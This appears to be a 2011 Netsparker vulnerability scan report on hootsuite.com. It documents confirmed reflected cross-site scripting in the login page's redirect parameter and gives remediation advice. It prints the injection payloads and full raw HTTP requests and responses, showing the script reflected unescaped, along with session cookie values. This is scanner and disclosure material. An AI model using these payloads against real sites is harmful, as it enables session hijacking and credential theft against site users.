Netsparker, Web Application Security Scanner

XSS, Cross Site Scripting, hootsuite.com, CWE-79, CAPEC-86, Javascript Injection

Loading
Netsparker - Scan Report Summary
TARGET URL
 http://hootsuite.com/
SCAN DATE
 3/1/2011 7:23:55 AM
REPORT DATE
 3/1/2011 8:51:53 AM
SCAN DURATION
 00:20:18

Total Requests

Average Speed

req/sec.
10
identified
10
confirmed
0
critical
0
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
 Previous Settings
ENABLED ENGINES
 Boolean SQL Injection, HTTP Header Injection, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
60 %
MEDIUM
10 %
LOW
30 %
Cross-site Scripting

Cross-site Scripting

4 TOTAL
IMPORTANT
CONFIRMED
4
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /login

/login CONFIRMED

https://hootsuite.com/login?redirect='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005FF)%3..

Parameters

Parameter Type Value
redirect GET '"--></style></script><script>alert(0x0005FF)</script>

Request

GET /login?redirect='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005FF)%3C/script%3E HTTP/1.1
Referer: http://hootsuite.com/affiliate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hootsuite.com
Cookie: _SID=aeddf69c6dd7c69b4152973210ce56a723f86f74; signup_plan_id=2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: HootSuite Server v1.1
Date: Tue, 01 Mar 2011 13:23:42 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Gridnum: 7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4130


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html class="static" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="ie=edge,chrome=1"> <meta name="keywords" content="HootSuite, Social Media Dashboard, Multiple Twitter Accounts, Corporate Twitter, Scheduled Tweets, Twitter Multiple User, Customized Twitter Layout, Twitter Stats" /> <meta name="description" content="HootSuite - Social Media Dashboard. With HootSuite, you can monitor keywords, manage multiple Twitter, Facebook, LinkedIn, Foursquare, Ping.fm and WordPress profiles, schedule messages, and measure your success." /> <link rel="apple-touch-icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/apple-touch-icon.png"/><meta name="application-name" content="HootSuite"/><meta name="application-url" content="http://hootsuite.com"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_128x128.png" sizes="128x128"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_48x48.png" sizes="48x48"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_32x32.png" sizes="32x32"/><link rel="shortcut icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/favicon.ico" /><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_16x16.png" sizes="16x16"/> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/base.gz.css" type="text/css" rel="stylesheet" /> <!--[if IE 7]> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/ie7.gz.css" type="text/css" rel="stylesheet" /> <![endif]--> <title>HootSuite - Social Media Dashboard for Teams using Twitter, Facebook, Linkedin</title></head> <body> <!--[if IE]> <a name="#" href="#"></a> <![endif]--> <script type="text/javascript">
var hs = hs || {};
hs.timers = new Object();
hs.prefs = new Object();
hs.c = new Object();
hs.c.rootUrl = "http://hootsuite.com";
hs.c.rootUrlSSL = "https://hootsuite.com";
hs.c.imageUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images";
hs.c.swfUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/swf";
hs.c.jsUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js";

hs.c.reportHeaderImageUrl = "https://d2l6uygi1pgnys.cloudfront.net/report_header_image/production";

hs.c.jsTemplateRootUrl = ('https:' == document.location.protocol.toLowerCase() ? hs.c.rootUrlSSL : hs.c.rootUrl) + '/js/internal/templates/';
hs.c.tweetPageSize = 30;
hs.prefs.language = '';
hs.timezoneOffset=null;
hs.memberId=null;
hs.socialNetworks=[];
hs.socialNetworksKeyedByType=[];
hs.memberAutoInitial="";
hs.prefs.isNotifyNewTweet=0;
hs.prefs.isNewRetweet = 0;
hs.prefs.theme = '';
hs.prefs.allowSlimStreams = false; // TODO: replace with value from DB
hs.languagePack = {};
hs.gp = 0;
hs.fbAppKey="e0bebeb3a55265b11821edce13e316fe";
hs.fbChannelPath="http://hootsuite.com/xd_receiver.htm";
hs.fbFanpageId="177463958820";
</script>

<script type="text/javascript" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js/hs.gz.js"></script>
<div id="statusContainer" style="display: none;position:absolute;"> <div class="statusMessage rb-a-4"><span class="_statusMsgContent"></span></div></div> <div id="container"> <div id="content"> <div class="primary login rb-a-5">
<div class="title">
<h1><a href="index.php">HootSuite - Social Media Dashboard</a></h1>
<h2>Login</h2>
</div>

<div class="section">

<div id="loginBox" class="rb-a-4">

<div id="openId">

<script type="text/javascript">
$().ready(function() {
openid.init('openid_identifier');
});
</script>

<form id="openid_form" action="https://hootsuite.com/openid-start" method="post" >
<input type="hidden" name="redirect" value="'"--></style></script><script>netsparker(0x0005FF)</script>"/> <div id="openid_choice" style="display: block; ">
<h3>Login or Signup with OpenID</h3>
<p>Select one of these third-party accounts:</p>
<div id="openid_btns"></div>
</div>
<div id="openid_input_area"></div>
</form>
</div>


<div id="secureId">

<form name="memberLoginForm" id="memberLoginForm" method="post" formtype="input" onKeyPress="checkForEnterKey(event, '_submitLogin');" action="https://hootsuite.com/login">
<label for="email" class="title">Email:</label>
<input id="email" type="text" name="loginInfo[email]" value="" maxlength="100" />
<p class="formError"></p>
<label for="password" class="title">Password:</label>
<input id="password" type="password" name="loginInfo[password]" maxlength="100" />
<p class="formError"></p>
<p class="forgotPassword"><a href="http://hootsuite.com/retrieve-password"><strong>Forgot my password</strong></a></p>
<p class="remember">
<label class="title"><input id="remember" class="checkbox" type="checkbox" name="loginInfo[rememberMe]" checked />&nbsp;Remember me</label>
</p>
<div class="btns">
<a class="btn-cmt _submitLogin" href="#" onclick="hs.throbberMgrObj.add('._submitLogin'); $('#memberLoginForm').submit();">Secure Login</a>
</div>
<div class="info">
Don't have an account? <a href="https://hootsuite.com/signup"><strong>Sign Up</strong></a>
</div>

<input type="hidden" name="redirect" value="&#039;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0005FF)&lt;/script&gt;" />
<input type="hidden" name="form_submit" value="Login" />
</form>
</div>


</div>
</div>
</div>

</div> <div id="footer"> <div class="footerLinks"> <span class="copy" title="0.1651 | 0 | 0% | 0">&copy;2008-2011 <a href="http://blog.hootsuite.com/company/" title="HootSuite Media" target="_blank">HootSuite Media</a></span> <div class="language"> <form name="languageSelectionForm" id="languageSelectionForm" method="get" formtype="input" action=""> <label for="language" class="title">Language: </label> <select name="language" onChange="changeSiteLanguage();return false;"> <option label="English" value="en" selected="selected">English</option><option label="French (Français)" value="fr">French (Français)</option><option label="Italian (Italiano)" value="it">Italian (Italiano)</option><option label="Japanese (日本語)" value="ja">Japanese (日本語)</option> </select></form> <script type="text/javascript">$(document).ready(function() { $("#languageSelectionForm select[name='language'] option[value='ja']").after('<option disabled="disabled">--------------------</option>');});function changeSiteLanguage(){ hs.statusObj.update(translation._("Switching language..."), 'info', true, 8000); var lang = $("#languageSelectionForm select option:selected").val(); ajaxCall({ type: 'POST', data: "language="+lang, url: "/ajax/index/change-language", success: function(data) { hs.statusObj.reset(); if (data.success) { //window.location=window.location.href; if ($.isFunction(window.location.reload)) { window.location.reload(true); // force reload } else { window.location = hs.c.rootUrl; } } else if (data.inProgress) { var params = { width: 347, maxHeight: 700, resizable: false, draggable: false, position: ['center', 60], modal: true, title: translation._("HootSuite Translation Project"), content: hsEjs.getEjs('index/language_translation').render(data) }, $popup = $.dialogFactory.create('inProgressLanguagePopup', params); return false; } else { if (data.paymentProcessorUnavailable && hs.statusObj != undefined) { hs.statusObj.update(translation._("Sorry, we are unable to complete this operation right now. Please try again later."), "error", true); } } }, error: function(){hs.statusObj.reset();} }, 'abortOld'); }</script> </div> <a href="http://feedback.hootsuite.com" target="_blank" class="_feedback">Feedback</a> | <a href="http://help.hootsuite.com" target="_blank">Help Desk</a> | <a href="http://blog.hootsuite.com/company/" target="_blank">Company</a> | <a href="http://hootsuite.com/about">About</a> | <a href="http://help.hootsuite.com/forums/81675-faqs" target="_blank">FAQ</a> | <a href="http://blog.hootsuite.com/" target="_blank">Blog</a> | <a href="http://hootsuite.com/terms">Terms</a> | <a href="http://hootsuite.com/privacy">Privacy Policy</a> | <a href="http://hootsuite.com/affiliate">Affiliate</a> </div> </div> </div> <script type="text/javascript"> $(document).ready(function() { hs.statusObj = new statusObject(); }); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> var _kmq = _kmq || []; var KM_NO_SWF = true; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/9c36ff6b1b1674dd970bc16e44d393a735ff3290.1.js'); //dev </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-17737250-1"); pageTracker._trackPageview(); } catch(err) {} </script> <script type="text/javascript"> __compete_code = '71a19afdb2cc5969a9b8957043af665b'; (function () { var s = document.createElement('script'), e = document.getElementsByTagName('script')[0], t = document.location.protocol.toLowerCase() === 'https:' ? 'https://c.compete.com/bootstrap/' : 'http://c.compete.com/bootstrap/'; s.src = t + __compete_code + '/bootstrap.js'; s.type = 'text/javascript'; s.async = true; if (e) { e.parentNode.insertBefore(s, e); } }()); </script> <!--[if lt IE 7]> <script src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js/third_party/ie6warning.js"></script><script>window.onload=function(){e("js/ie6/")}</script> <![endif]--> <!-- Segment Pixel – Hootsuite - DO NOT MODIFY --> <img src="https://secure.adnxs.com/seg?add=67726&t=2" width="1" height="1" /> <!-- End of Segment Pixel --> </body></html>
- /login

/login CONFIRMED

https://hootsuite.com/login?redirect='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0008FD)%3..

Parameters

Parameter Type Value
redirect GET '"--></style></script><script>alert(0x0008FD)</script>
language GET en

Request

GET /login?redirect='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0008FD)%3C/script%3E&language=en HTTP/1.1
Referer: https://hootsuite.com/login?redirect=affiliate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hootsuite.com
Cookie: _SID=105f2ea3bb6f58c9f1810bc4fdfe9dd5eee494f3; signup_plan_id=2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: HootSuite Server v1.1
Date: Tue, 01 Mar 2011 13:24:51 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Gridnum: 12
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html class="static" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="ie=edge,chrome=1"> <meta name="keywords" content="HootSuite, Social Media Dashboard, Multiple Twitter Accounts, Corporate Twitter, Scheduled Tweets, Twitter Multiple User, Customized Twitter Layout, Twitter Stats" /> <meta name="description" content="HootSuite - Social Media Dashboard. With HootSuite, you can monitor keywords, manage multiple Twitter, Facebook, LinkedIn, Foursquare, Ping.fm and WordPress profiles, schedule messages, and measure your success." /> <link rel="apple-touch-icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/apple-touch-icon.png"/><meta name="application-name" content="HootSuite"/><meta name="application-url" content="http://hootsuite.com"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_128x128.png" sizes="128x128"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_48x48.png" sizes="48x48"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_32x32.png" sizes="32x32"/><link rel="shortcut icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/favicon.ico" /><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_16x16.png" sizes="16x16"/> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/base.gz.css" type="text/css" rel="stylesheet" /> <!--[if IE 7]> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/ie7.gz.css" type="text/css" rel="stylesheet" /> <![endif]--> <title>HootSuite - Social Media Dashboard for Teams using Twitter, Facebook, Linkedin</title></head> <body> <!--[if IE]> <a name="#" href="#"></a> <![endif]--> <script type="text/javascript">
var hs = hs || {};
hs.timers = new Object();
hs.prefs = new Object();
hs.c = new Object();
hs.c.rootUrl = "http://hootsuite.com";
hs.c.rootUrlSSL = "https://hootsuite.com";
hs.c.imageUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images";
hs.c.swfUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/swf";
hs.c.jsUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js";

hs.c.reportHeaderImageUrl = "https://d2l6uygi1pgnys.cloudfront.net/report_header_image/production";

hs.c.jsTemplateRootUrl = ('https:' == document.location.protocol.toLowerCase() ? hs.c.rootUrlSSL : hs.c.rootUrl) + '/js/internal/templates/';
hs.c.tweetPageSize = 30;
hs.prefs.language = '';
hs.timezoneOffset=null;
hs.memberId=null;
hs.socialNetworks=[];
hs.socialNetworksKeyedByType=[];
hs.memberAutoInitial="";
hs.prefs.isNotifyNewTweet=0;
hs.prefs.isNewRetweet = 0;
hs.prefs.theme = '';
hs.prefs.allowSlimStreams = false; // TODO: replace with value from DB
hs.languagePack = {};
hs.gp = 0;
hs.fbAppKey="e0bebeb3a55265b11821edce13e316fe";
hs.fbChannelPath="http://hootsuite.com/xd_receiver.htm";
hs.fbFanpageId="177463958820";
</script>

<script type="text/javascript" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js/hs.gz.js"></script>
<div id="statusContainer" style="display: none;position:absolute;"> <div class="statusMessage rb-a-4"><span class="_statusMsgContent"></span></div></div> <div id="container"> <div id="content"> <div class="primary login rb-a-5">
<div class="title">
<h1><a href="index.php">HootSuite - Social Media Dashboard</a></h1>
<h2>Login</h2>
</div>

<div class="section">

<div id="loginBox" class="rb-a-4">

<div id="openId">

<script type="text/javascript">
$().ready(function() {
openid.init('openid_identifier');
});
</script>

<form id="openid_form" action="https://hootsuite.com/openid-start" method="post" >
<input type="hidden" name="redirect" value="'"--></style></script><script>netsparker(0x0008FD)</script>"/> <div id="openid_choice" style="display: block; ">
<h3>Login or Signup with OpenID</h3>
<p>Select one of these third-party accounts:</p>
<div id="openid_btns"></div>
</div>
<div id="openid_input_area"></div>
</form>
</div>


<div id="secureId">

<form name="memberLoginForm" id="memberLoginForm" method="post" formtype="input" onKeyPress="checkForEnterKey(event, '_submitLogin');" action="https://hootsuite.com/login">
<label for="email" class="title">Email:</label>
<input id="email" type="text" name="loginInfo[email]" value="" maxlength="100" />
<p class="formError"></p>
<label for="password" class="title">Password:</label>
<input id="password" type="password" name="loginInfo[password]" maxlength="100" />
<p class="formError"></p>
<p class="forgotPassword"><a href="http://hootsuite.com/retrieve-password"><strong>Forgot my password</strong></a></p>
<p class="remember">
<label class="title"><input id="remember" class="checkbox" type="checkbox" name="loginInfo[rememberMe]" checked />&nbsp;Remember me</label>
</p>
<div class="btns">
<a class="btn-cmt _submitLogin" href="#" onclick="hs.throbberMgrObj.add('._submitLogin'); $('#memberLoginForm').submit();">Secure Login</a>
</div>
<div class="info">
Don't have an account? <a href="https://hootsuite.com/signup"><strong>Sign Up</strong></a>
</div>

<input type="hidden" name="redirect" value="&#039;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0008FD)&lt;/script&gt;" />
<input type="hidden" name="form_submit" value="Login" />
</form>
</div>


</div>
</div>
</div>

</div> <div id="footer"> <div class="footerLinks"> <span class="copy" title="0.211 | 0 | 0% | 0">&copy;2008-2011 <a href="http://blog.hootsuite.com/company/" title="HootSuite Media" target="_blank">HootSuite Media</a></span> <div class="language"> <form name="languageSelectionForm" id="languageSelectionForm" method="get" formtype="input" action=""> <label for="language" class="title">Language: </label> <select name="language" onChange="changeSiteLanguage();return false;"> <option label="English" value="en" selected="selected">English</option><option label="French (Français)" value="fr">French (Français)</option><option label="Italian (Italiano)" value="it">Italian (Italiano)</option><option label="Japanese (日本語)" value="ja">Japanese (日本語)</option> </select></form> <script type="text/javascript">$(document).ready(function() { $("#languageSelectionForm select[name='language'] option[value='ja']").after('<option disabled="disabled">--------------------</option>');});function changeSiteLanguage(){ hs.statusObj.update(translation._("Switching language..."), 'info', true, 8000); var lang = $("#languageSelectionForm select option:selected").val(); ajaxCall({ type: 'POST', data: "language="+lang, url: "/ajax/index/change-language", success: function(data) { hs.statusObj.reset(); if (data.success) { //window.location=window.location.href; if ($.isFunction(window.location.reload)) { window.location.reload(true); // force reload } else { window.location = hs.c.rootUrl; } } else if (data.inProgress) { var params = { width: 347, maxHeight: 700, resizable: false, draggable: false, position: ['center', 60], modal: true, title: translation._("HootSuite Translation Project"), content: hsEjs.getEjs('index/language_translation').render(data) }, $popup = $.dialogFactory.create('inProgressLanguagePopup', params); return false; } else { if (data.paymentProcessorUnavailable && hs.statusObj != undefined) { hs.statusObj.update(translation._("Sorry, we are unable to complete this operation right now. Please try again later."), "error", true); } } }, error: function(){hs.statusObj.reset();} }, 'abortOld'); }</script> </div> <a href="http://feedback.hootsuite.com" target="_blank" class="_feedback">Feedback</a> | <a href="http://help.hootsuite.com" target="_blank">Help Desk</a> | <a href="http://blog.hootsuite.com/company/" target="_blank">Company</a> | <a href="http://hootsuite.com/about">About</a> | <a href="http://help.hootsuite.com/forums/81675-faqs" target="_blank">FAQ</a> | <a href="http://blog.hootsuite.com/" target="_blank">Blog</a> | <a href="http://hootsuite.com/terms">Terms</a> | <a href="http://hootsuite.com/privacy">Privacy Policy</a> | <a href="http://hootsuite.com/affiliate">Affiliate</a> </div> </div> </div> <script type="text/javascript"> $(document).ready(function() { hs.statusObj = new statusObject(); }); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> var _kmq = _kmq || []; var KM_NO_SWF = true; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/9c36ff6b1b1674dd970bc16e44d393a735ff3290.1.js'); //dev </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-17737250-1"); pageTracker._trackPageview(); } catch(err) {} </script> <script type="text/javascript"> __compete_code = '71a19afdb2cc5969a9b8957043af665b'; (function () { var s = document.createElement('script'), e = document.getElementsByTagName('script')[0], t = document.location.protocol.toLowerCase() === 'https:' ? 'https://c.compete.com/bootstrap/' : 'http://c.compete.com/bootstrap/'; s.src = t + __compete_code + '/bootstrap.js'; s.type = 'text/javascript'; s.async = true; if (e) { e.parentNode.insertBefore(s, e); } }()); </script> <!--[if lt IE 7]> <script src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js/third_party/ie6warning.js"></script><script>window.onload=function(){e("js/ie6/")}</script> <![endif]--> <!-- Segment Pixel – Hootsuite - DO NOT MODIFY --> <img src="https://secure.adnxs.com/seg?add=67726&t=2" width="1" height="1" /> <!-- End of Segment Pixel --> </body></html>
- /login

/login CONFIRMED

https://hootsuite.com/login

Parameters

Parameter Type Value
loginInfo[email] POST netsparker@example.com
loginInfo[password] POST 3
loginInfo[rememberMe] POST on
redirect POST '"--></style></script><script>alert(0x0009BB)</script>
form_submit POST Login

Request

POST /login HTTP/1.1
Referer: http://hootsuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: hootsuite.com
Cookie: _SID=105f2ea3bb6f58c9f1810bc4fdfe9dd5eee494f3; signup_plan_id=2
Content-Length: 201
Accept-Encoding: gzip, deflate

loginInfo[email]=netsparker%40example.com&loginInfo[password]=3&loginInfo[rememberMe]=on&redirect='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0009BB)%3c%2fscript%3e&form_submit=Login

Response

HTTP/1.1 200 OK
Server: HootSuite Server v1.1
Date: Tue, 01 Mar 2011 13:25:24 GMT
Content-Type: text/html
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Gridnum: 32
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4276


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html class="static" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="ie=edge,chrome=1"> <meta name="keywords" content="HootSuite, Social Media Dashboard, Multiple Twitter Accounts, Corporate Twitter, Scheduled Tweets, Twitter Multiple User, Customized Twitter Layout, Twitter Stats" /> <meta name="description" content="HootSuite - Social Media Dashboard. With HootSuite, you can monitor keywords, manage multiple Twitter, Facebook, LinkedIn, Foursquare, Ping.fm and WordPress profiles, schedule messages, and measure your success." /> <link rel="apple-touch-icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/apple-touch-icon.png"/><meta name="application-name" content="HootSuite"/><meta name="application-url" content="http://hootsuite.com"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_128x128.png" sizes="128x128"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_48x48.png" sizes="48x48"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_32x32.png" sizes="32x32"/><link rel="shortcut icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/favicon.ico" /><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_16x16.png" sizes="16x16"/> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/base.gz.css" type="text/css" rel="stylesheet" /> <!--[if IE 7]> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/ie7.gz.css" type="text/css" rel="stylesheet" /> <![endif]--> <title>HootSuite - Social Media Dashboard for Teams using Twitter, Facebook, Linkedin</title></head> <body> <!--[if IE]> <a name="#" href="#"></a> <![endif]--> <script type="text/javascript">
var hs = hs || {};
hs.timers = new Object();
hs.prefs = new Object();
hs.c = new Object();
hs.c.rootUrl = "http://hootsuite.com";
hs.c.rootUrlSSL = "https://hootsuite.com";
hs.c.imageUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images";
hs.c.swfUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/swf";
hs.c.jsUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js";

hs.c.reportHeaderImageUrl = "https://d2l6uygi1pgnys.cloudfront.net/report_header_image/production";

hs.c.jsTemplateRootUrl = ('https:' == document.location.protocol.toLowerCase() ? hs.c.rootUrlSSL : hs.c.rootUrl) + '/js/internal/templates/';
hs.c.tweetPageSize = 30;
hs.prefs.language = '';
hs.timezoneOffset=null;
hs.memberId=null;
hs.socialNetworks=[];
hs.socialNetworksKeyedByType=[];
hs.memberAutoInitial="";
hs.prefs.isNotifyNewTweet=0;
hs.prefs.isNewRetweet = 0;
hs.prefs.theme = '';
hs.prefs.allowSlimStreams = false; // TODO: replace with value from DB
hs.languagePack = {};
hs.gp = 0;
hs.fbAppKey="e0bebeb3a55265b11821edce13e316fe";
hs.fbChannelPath="http://hootsuite.com/xd_receiver.htm";
hs.fbFanpageId="177463958820";
</script>

<script type="text/javascript" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js/hs.gz.js"></script>
<div id="statusContainer" style="display: none;position:absolute;"> <div class="statusMessage rb-a-4"><span class="_statusMsgContent"></span></div></div> <div id="container"> <div class="errorMessage global-message rb-a-4" id="flashMessage_Error"> <a class="icon-19 close" onclick="fadeSlideRemove($('#flashMessage_Error')); return false;">Close</a> <h3>Error</h3> <strong>There are errors, please check the message below.</strong> </div> <div id="content"> <div class="primary login rb-a-5">
<div class="title">
<h1><a href="index.php">HootSuite - Social Media Dashboard</a></h1>
<h2>Login</h2>
</div>

<div class="section">

<div id="loginBox" class="rb-a-4">

<div id="openId">

<script type="text/javascript">
$().ready(function() {
openid.init('openid_identifier');
});
</script>

<form id="openid_form" action="https://hootsuite.com/openid-start" method="post" >
<input type="hidden" name="redirect" value="'"--></style></script><script>netsparker(0x0009BB)</script>"/> <div id="openid_choice" style="display: block; ">
<h3>Login or Signup with OpenID</h3>
<p>Select one of these third-party accounts:</p>
<div id="openid_btns"></div>
</div>
<div id="openid_input_area"></div>
</form>
</div>


<div id="secureId">

<form name="memberLoginForm" id="memberLoginForm" method="post" formtype="input" onKeyPress="checkForEnterKey(event, '_submitLogin');" action="https://hootsuite.com/login">
<label for="email" class="title">Email:</label>
<input id="email" type="text" name="loginInfo[email]" value="" maxlength="100" />
<p class="formError">The supplied email can not be found</p>
<label for="password" class="title">Password:</label>
<input id="password" type="password" name="loginInfo[password]" maxlength="100" />
<p class="formError"></p>
<p class="forgotPassword"><a href="http://hootsuite.com/retrieve-password"><strong>Forgot my password</strong></a></p>
<p class="remember">
<label class="title"><input id="remember" class="checkbox" type="checkbox" name="loginInfo[rememberMe]" checked />&nbsp;Remember me</label>
</p>
<div class="btns">
<a class="btn-cmt _submitLogin" href="#" onclick="hs.throbberMgrObj.add('._submitLogin'); $('#memberLoginForm').submit();">Secure Login</a>
</div>
<div class="info">
Don't have an account? <a href="https://hootsuite.com/signup"><strong>Sign Up</strong></a>
</div>

<input type="hidden" name="redirect" value="&#039;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0009BB)&lt;/script&gt;" />
<input type="hidden" name="form_submit" value="Login" />
</form>
</div>


</div>
</div>
</div>

